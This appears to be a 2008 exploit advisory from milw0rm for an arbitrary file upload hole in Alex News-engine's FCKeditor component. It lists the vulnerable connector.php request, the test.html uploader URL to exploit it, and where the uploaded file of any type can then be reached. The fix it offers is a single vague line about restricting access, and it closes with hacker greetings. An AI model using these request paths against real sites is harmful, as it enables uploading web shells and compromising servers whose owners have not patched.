49 lines
No EOL
1.1 KiB
Text
49 lines
No EOL
1.1 KiB
Text
########################################################################
|
|
#
|
|
# Yellow Flood Organization
|
|
#
|
|
# Alex News-engine (fckeditor) Arbitrary File Upload
|
|
#
|
|
# Source: http://www.alexscriptengine.de/blog/category/news-engine/
|
|
#
|
|
# Download: http://www.alexscriptengine.de/blog/asedownloads/news-engine/
|
|
#
|
|
# Discover by: Batter
|
|
#
|
|
########################################################################
|
|
|
|
|
|
|
|
####################
|
|
- Vulnerability:
|
|
####################
|
|
|
|
/editors/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=FileUpload&Type=File&CurrentFolder=/
|
|
|
|
####################
|
|
- Exploit:
|
|
####################
|
|
|
|
http://www.site.com/path/admin/includes/FCKeditor/editor/filemanager/browser/default/connectors/test.html
|
|
|
|
####################
|
|
- how To use:
|
|
####################
|
|
|
|
http://www.site.com/script-folder-name/script-folder-name/images/site_images/uploadet-file.*
|
|
|
|
####################
|
|
- Solution:
|
|
####################
|
|
|
|
Restrict and grant only trusted users access to the resources.
|
|
|
|
####################
|
|
- Greets :
|
|
####################
|
|
|
|
THE.HACKER.ONE , Str0ke
|
|
|
|
####################
|
|
|
|
# milw0rm.com [2008-11-19] |